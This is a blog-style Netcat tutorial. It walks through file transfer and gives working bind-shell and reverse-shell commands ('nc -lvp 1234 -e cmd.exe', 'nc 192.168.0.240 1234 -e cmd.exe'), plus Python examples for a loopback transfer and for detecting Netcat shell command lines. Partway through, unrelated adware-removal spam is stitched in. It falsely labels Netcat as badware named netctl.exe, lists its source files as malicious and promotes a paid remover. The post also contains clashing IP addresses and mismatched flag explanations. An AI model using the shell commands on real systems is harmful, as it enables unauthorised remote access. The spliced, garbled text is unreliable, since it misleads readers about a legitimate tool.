29 April 2017 / Netcat

What is Netcat?

Netcat is considered the Swiss-army knife in information security. Basically, it's a powerful version of the classic Telnet program, capable of numerous additional tasks such as chatting, file transfer, port scanning, banner grabbing, opening remote shells and even setting up a honeypot. An important feature of Netcat is that it can serve both as a client and as a server (more detail later).


In this blog post, I'll walk through some practical examples of the different uses of Netcat. I won't show you how to chat or do a port scan with Netcat because there are better tools available for these purposes. It is good to know that Netcat is available for both Linux and Windows.

1. File transfer with Netcat

Netcat is a great tool to send files over the network from one machine to another.

In my lab, I am running two virtual machines (Kali Linux and Windows 7) on VirtualBox. Both are connected via a network bridge, so they are part of my internal network. Both machines have Netcat installed.

On the Windows 7 machine, we created a simple text file that we want to send to the Kali Linux machine. The Windows 7 machine's IP address is 192.168.0.249, Kali's IP address is 182.168.0.114.

Step 1: send the file from the Windows VM to the Kali VM

    nc 192.168.0.114 1234 < zeroday.txt

nc (run Netcat)
-lvp 1234 (Listen Verbosely on Port 1234)
> zeroday.txt (output any data transferred to a file called zeroday.txt)

In the left screenshot we cat the file, and you can see it is indeed our text file from our Windows VM.
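An added example (not from the original post) that runs both ends of this transfer over loopback in Python, to show what the two Netcat commands do on the wire: raw bytes with no framing, authentication or integrity check, so the two sides compare a SHA-256 digest afterwards. The loopback address, the OS-chosen port and the sample file contents are assumptions made for the example.

```python
import hashlib
import socket
import threading


def receive(listener, sink):
    """Listening side: accept one peer and keep every byte it sends."""
    conn, _peer = listener.accept()  # no authentication: any peer that connects is accepted
    with conn:
        while True:
            chunk = conn.recv(4096)
            if not chunk:  # peer closed the connection: the only end-of-file marker
                break
            sink.extend(chunk)


def send(host, port, payload):
    """Sending side: connect, write the file bytes, close."""
    with socket.create_connection((host, port), timeout=5) as conn:
        conn.sendall(payload)


def transfer(payload):
    """Run both ends on loopback; return (received bytes, sender digest, receiver digest)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))  # assumption: loopback and an OS-chosen port, not 1234
    listener.listen(1)
    listener.settimeout(5)
    sink = bytearray()
    worker = threading.Thread(target=receive, args=(listener, sink), daemon=True)
    worker.start()
    send("127.0.0.1", listener.getsockname()[1], payload)
    worker.join(timeout=5)
    listener.close()
    # Nothing in the stream proves the file arrived intact, so hash it on both sides.
    return bytes(sink), hashlib.sha256(payload).hexdigest(), hashlib.sha256(sink).hexdigest()


SAMPLE = b"constructed stand-in for zeroday.txt\r\n"  # constructed sample contents

if __name__ == "__main__":
    data, sent_digest, received_digest = transfer(SAMPLE)
    print(len(data), "bytes received; digests match:", sent_digest == received_digest)
```

On the real machines the same comparison is done by hashing the file on each side once the transfer has finished.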

2. Reverse shell and remote shell with Netcat

Getting a reverse or remote shell is one of the key goals in offensive security. First, it's important to understand the difference between a remote shell and a reverse shell.

A remote shell (or bind shell) is when you bind a shell to a local port on one machine, and another machine connects to that port to use the shell remotely.

A reverse shell is when you tell the shell to connect back to your machine, which is listening for a connection ready for exploitation.

Which one to use depends on the network. Consider the scenario below: Dennis has a computer connected to the internet but within a NAT network, whilst Sophie is directly connected to the internet.

Sophie's computer is directly accessible from the internet, but Dennis' system is not because it's behind a NAT.

If Dennis needs a shell on Sophie's computer, he can use a remote shell. He simply tries to connect to Sophie's system via Netcat whilst Sophie starts listening for a connection. Once connected, she can bind her shell to the connection. A remote shell is established and Dennis can execute commands via this shell.

If Sophie wants a shell on Dennis' computer, she cannot connect to his computer, as his system is not publicly available.

To overcome this, Dennis would need to bind his shell from his side to the network via Netcat and connect to Sophie, whilst Sophie should start listening for incoming connections. Once connected, Sophie has access to Dennis' shell and can execute commands as well.

So basically, a bind shell is you connecting from your machine to the shell; a reverse shell is the shell connecting to a listening service (Netcat) on your machine.

Example 1: get a remote shell via Netcat

Let's start simply by demonstrating how you can achieve a remote shell with Netcat from one machine to another. In this example, we are going to bind the shell on the Windows VM and connect to this shell via the Kali VM.

Windows VM side:

    nc -lvp 1234 -e cmd.exe


nc (run Netcat)
-lvp 1234 (Listen Verbosely on Port 1234 (randomly chosen))
-e cmd.exe (binds cmd.exe to Netcat)

Kali VM side:

    nc 192.168.0.249 1234

nc (run Netcat)
192.168.0.249 1234 (IP of the Windows VM + chosen port)

Note: if you would like to bind a Linux shell instead of a Windows shell to Netcat, use /bin/bash instead of cmd.exe.

Example 2: get a reverse shell via Netcat

Next, we'll try getting a reverse shell. Instead of the attacking machine connecting to the target machine like in the first example, we are now going to bind the shell on the target machine to Netcat and initiate a connection to the attacking machine.

My Kali IP address in this exercise is 192.168.0.240.

Windows client:

    nc 192.168.0.240 1234 -e cmd.exe

Kali VM:

    ncat -lvp 1234

Real-life scenarios

In offensive security, getting a reverse shell is a very big step in compromising a system. Unfortunately, in real-life scenarios Netcat is in most cases not available, and you have no immediate way to install or run it. For any method to work, the attacker either needs to be able to execute arbitrary commands on the system (your options are limited by the scripting languages installed on the target machine, such as Bash, Perl, Python or PowerShell) or should be able to upload a file that can be executed by opening it from the browser, for example a reverse-shell PHP script.
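From the defender's side, the commands in Examples 1 and 2 differ from a plain Netcat client or listener only by the -e option, which is what a process-creation rule can key on. The following is an added example, not code from the original post: it classifies command lines by role, using option letters from traditional Netcat and Ncat; the host names and the event list are constructed for the example.

```python
import ntpath

NETCAT_NAMES = {"nc", "ncat", "netcat", "nc.exe", "ncat.exe", "netcat.exe"}
# Short options that take a value end a bundle: "-lvp 1234" is l, v, p(=1234).
TAKES_VALUE = set("egGiopsw")


def short_flags(token):
    """Expand a bundled short-option token such as "-lvp" into its letters."""
    flags = []
    for ch in token[1:]:
        flags.append(ch)
        if ch in TAKES_VALUE:
            break
    return flags


def classify(cmdline):
    """Return the Netcat role of a command line, or None if it is not Netcat by name."""
    tokens = cmdline.split()
    if not tokens or ntpath.basename(tokens[0]).lower() not in NETCAT_NAMES:
        return None  # name-based match only; pair with hash or network telemetry
    listen = attached = False
    for tok in tokens[1:]:
        if tok == "--listen":
            listen = True
        elif tok in ("--exec", "--sh-exec"):
            attached = True
        elif tok.startswith("-") and not tok.startswith("--"):
            flags = short_flags(tok)
            listen = listen or "l" in flags or "L" in flags
            attached = attached or "e" in flags
    if attached:  # a program such as cmd.exe is wired to the socket
        return "bind-shell" if listen else "reverse-shell"
    return "listener" if listen else "client"


# Constructed process-creation records: host names are placeholders, the
# command lines are the ones used in this post.
EVENTS = [
    ("win7-vm", "nc -lvp 1234 -e cmd.exe"),
    ("win7-vm", "nc 192.168.0.240 1234 -e cmd.exe"),
    ("kali-vm", "ncat -lvp 1234"),
    ("kali-vm", "nc 192.168.0.249 1234"),
]


def shell_alerts(events):
    """Keep only the records where Netcat has a program attached."""
    hits = [(host, classify(cmd)) for host, cmd in events]
    return [(h, v) for h, v in hits if v in ("bind-shell", "reverse-shell")]
```

The plain listener and client lines stay unflagged, so the file-transfer commands from the first section do not raise a shell alert.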

Netcat | netctl.exe | Badware | Win32 (Windows XP, Vista/7, 8/8.1, Windows 10) | Google Chrome, Mozilla Firefox, Internet Explorer, Safari

Using Netcat removal tools is a widely used computer-protection practice for removing Netcat. Netcat's presence is usually hidden from users, which is why it is hard to remove. Spreading Netcat is counted as a criminal act, but that doesn't mean that you don't need to install Netcat removal tools because legal proceedings will save you.

Many users habitually ignore software permission prompts, which allows Netcat to be installed on their computers. Netcat removal tools can scan for Netcat while performing a removal and stop any attempts by it to penetrate the PC. Like most anti-malware, many Netcat removal tools need a frequently updated database of pests to let users perform a proper Netcat removal.

Netcat intrusion method

Netcat installs on your PC along with free software. This method is called 'bundled installation'. The freeware offers to install an additional module (Netcat).

Then, if you fail to decline the offer, it starts a hidden installation. Netcat copies its file(s) to your hard disk. Its typical file name is netctl.exe. Sometimes it creates a new startup key with the name Netcat and the value netctl.exe. You can also find it in your process list under the name netctl.exe or Netcat. It can also create a folder named Netcat under C:\Program Files or C:\ProgramData.

After installation, Netcat starts displaying ads, pop-ups and banners on your PC or in browsers. It is recommended to remove Netcat immediately.

WiperSoft Antispyware was developed to remove threats like Netcat in automatic mode. The remover has an active module to protect the PC from hijackers, trojans, ransomware and other viruses. The trial version of Wipersoft provides detection of computer viruses for FREE.

To remove malware, you have to purchase the full version of Wipersoft. The threat's description and solution are developed by the Security Stronghold security team.

How to remove Netcat manually

This problem can be solved manually by deleting all registry keys and files connected with Netcat, removing it from the startup list and unregistering all corresponding DLLs.

Additionally, missing DLLs should be restored from the distribution in case they are corrupted by Netcat.

To get rid of Netcat, you should:

1. Kill the following processes and delete the appropriate files:

doexec.c, doexec.obj, generic.h, getopt.obj, gtvx.exe, hobbit.txt, makefile.dsp, makefile.ncb, makefile.opt, nc.dsp, nc.exe, nc.ilk, nc.ncb, nc.opt, nc23.exe, netcat.blu, netcat.c, netcat.dsp, netcat.exe, netcat.mak, netcat.mdp, netcat.ncb, netcat.obj, netcat.opt, netcat.txt, pskill.exe, vc50.idb, vc50.pch, tlist.exe, netctl.exe

Warning: you should delete only those files whose checksums are listed as malicious. There may be valid files with the same names on your system.

2. Delete the following malicious folders:

no information

3. Delete the following malicious registry entries and/or values:

no information

Warning: if a value is listed for some registry entries, you should only clear these values and leave the keys with such values untouched.

Uninstall Netcat related programs from Control Panel

We recommend that you check the list of installed programs and search for a Netcat entry or other unknown and suspicious programs.


Below are instructions for different versions of Windows. In some cases adware programs are protected by a malicious service or process that will not allow you to uninstall them.